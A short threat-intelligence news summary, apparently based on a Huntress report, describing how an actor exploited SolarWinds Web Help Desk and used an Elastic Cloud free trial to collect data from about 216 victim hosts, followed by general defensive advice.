Threat Intel - Actor Exploits Elastic Cloud Free Trial
Basically, a hacker used a free trial of a security tool to steal data from multiple organizations.
A threat actor exploited Elastic Cloud's free trial for data exfiltration, affecting multiple organizations. This incident underscores the ongoing risks in cybersecurity. Immediate action is being taken to address the vulnerabilities.
The Threat
A recent investigation by Huntress has unveiled a threat actor exploiting vulnerabilities in SolarWinds Web Help Desk. This actor has been using a free trial of Elastic Cloud SIEM to exfiltrate victim data. By leveraging legitimate infrastructure, they managed to gather sensitive information from various organizations, revealing the extent of their campaign.
The actor executed an encoded PowerShell command to extract detailed system information from compromised machines. This data was then sent to an attacker-controlled ElasticSearch index. The use of Elastic Cloud for such malicious activities is alarming, as it showcases how attackers can manipulate legitimate services for nefarious purposes.
Who's Behind It
The investigation indicates that the adversary registered their Elastic Cloud trial using a disposable email from a temporary email service. This tactic is common among cybercriminals to maintain anonymity. The actor's infrastructure also included connections to a SAFING_VPN, which further complicates tracking their activities.
Interestingly, the threat actor's operations were not isolated. They appeared to have connections to other opportunistic attacks against software like Microsoft SharePoint, indicating a broader strategy targeting multiple vulnerabilities across various platforms. The use of disposable emails and VPNs suggests a well-planned approach to evade detection.
Tactics & Techniques
During their campaign, the threat actor demonstrated considerable activity within the Elastic Cloud instance. They performed extensive data triage, logging numerous interactions over several days. This included targeted searches for high-value assets such as domain controllers and servers, indicating a focus on critical infrastructure.
The analysis revealed that the compromised data came from approximately 216 unique victim hosts, predominantly servers running Windows Server. The affected organizations spanned multiple sectors, including government, education, and finance, highlighting the widespread impact of this threat.
Defensive Measures
In response to this exploitation, Huntress has coordinated with Elastic and law enforcement to mitigate the threat. They have taken steps to notify affected organizations and investigate the breach further. For organizations, it is crucial to monitor for any unusual activity and ensure that security measures are in place to protect against similar attacks.
To safeguard against such threats, consider implementing the following measures:
- Regularly update and patch software to close vulnerabilities.
- Monitor network traffic for unusual patterns that may indicate data exfiltration.
- Educate employees about the risks of phishing and the importance of using secure, verified email services.
By staying vigilant and proactive, organizations can better defend against the tactics employed by threat actors like the one exploiting Elastic Cloud's free trial.
Huntress Blog